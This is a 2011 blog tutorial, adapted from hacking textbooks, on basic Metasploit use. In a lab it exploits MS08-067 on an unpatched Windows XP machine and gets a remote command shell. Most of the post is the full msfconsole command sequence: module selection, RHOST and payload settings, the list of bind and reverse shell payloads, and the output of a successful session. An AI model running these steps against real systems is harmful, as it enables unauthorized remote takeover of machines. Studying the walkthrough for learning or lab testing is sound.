Home


Saturday, November 26, 2011

Basic Metasploit Usage


Basic Metasploit Usage:

Books used : Gray Hat Hacking ,Hacking exposed 6th edition

LAB Setup:
1.Unpatched Windows XP Machine,the target.
2.Machine to launch Metasploit from,Windows or Linux.

Note*** :
Hackers may have access to an exploit months before
a patch is released.Also considering that a lot of people
may not patch there machines regularly this gives Hackers
another Window of opportunity.Hackers use the same old
known methods and usually choose low hanging fruit.



Step 1.
Target : Windows XP unpatched
Vulnerability : MS08-067 Windows XP.
This vulenrability led to the Conficker superworm of
late 2008–early 2009.
Goal: Get a remote command shell on the unpatched Windows XP Machine.

Step 2.
Install Metasploit on Linux or Windows.

Step 3.Commands
msf >
msf > search ms08-067
[*] Searching loaded modules for pattern 'ms08-067'...
Exploits
========
Name Rank Description
---- ---- -----------
windows/smb/ms08_067_netapi great Microsoft Server Service Relative Path
Stack Corruption

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

(Notice prompt changes,you are now in 'exploit mode')

You can get back to the
original launch state at the main console by issuing the back command:

msf exploit(ms08_067_netapi) > back
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

This exploit requires a target address, the port number on which SMB
(Server Message Block) listens, and the name of the pipe exposing this
functionality:
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.6
RHOST => 192.168.1.6

With the exploit module set, we next need to set the payload. The payload is the action
that happens after the vulnerability is exploited. It’s like choosing how you want
to interact with the compromised machine if the vulnerability is triggered successfully.
For this first example, let’s use a payload that simply opens a command shell listening
on a TCP port:

msf exploit(ms08_067_netapi) > search "Windows Command Shell"
[*] Searching loaded modules for pattern 'Windows Command Shell'...
Compatible Payloads
===================
Name Rank Description
---- ---- -----------
windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP
Stager (IPv6)
windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP
Stager (No NX Support)
windows/shell/bind_tcp normal Windows Command Shell, Bind TCP
Stager
windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse
TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse
TCP Stager (No NX Support)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse
Ordinal TCP Stager
windows/shell/reverse_tcp normal Windows Command Shell, Reverse
TCP Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse
All-Port TCP Stager
windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse
TCP Stager (DNS)
windows/shell_bind_tcp normal Windows Command Shell, Bind TCP
Inline
windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP
Inline

In typical gratuitous Metasploit style, there are 11 payloads that provide a Windows
command shell. Some open a listener on the host, some cause the host to “phone
home” to the attacking workstation, some use IPv6, some set up the command shell in
one network roundtrip (“inline”), while others utilize multiple roundtrips (“staged”).
One even connects back to the attacker tunneled over DNS. This Windows XP target
virtual machine does not have a firewall enabled, so we’ll use a simple windows/shell/
bind_tcp exploit:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp

If the target were running a firewall, we might instead choose a payload that would
cause the compromised workstation to connect back to the attacker (“reverse”):
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.6 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST 192.168.1.6 no The target address

By default, this exploit will open a listener on tcp port4444, allowing us to connect
for the command shell. Let’s attempt the exploit:
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.1.6
[*] Command shell session 1 opened (192.168.1.4:49623 -> 192.168.1.6:4444)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>echo w00t!
echo w00t!
w00t!
It worked! We can verify the connection by issuing the netstat command from the
Windows XP machine console, looking for established connections on port 4444:
C:\>netstat -ano | findstr 4444 | findstr ESTABLISHED
TCP 192.168.1.6:4444 192.168.1.4:49623 ESTABLISHED 964
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)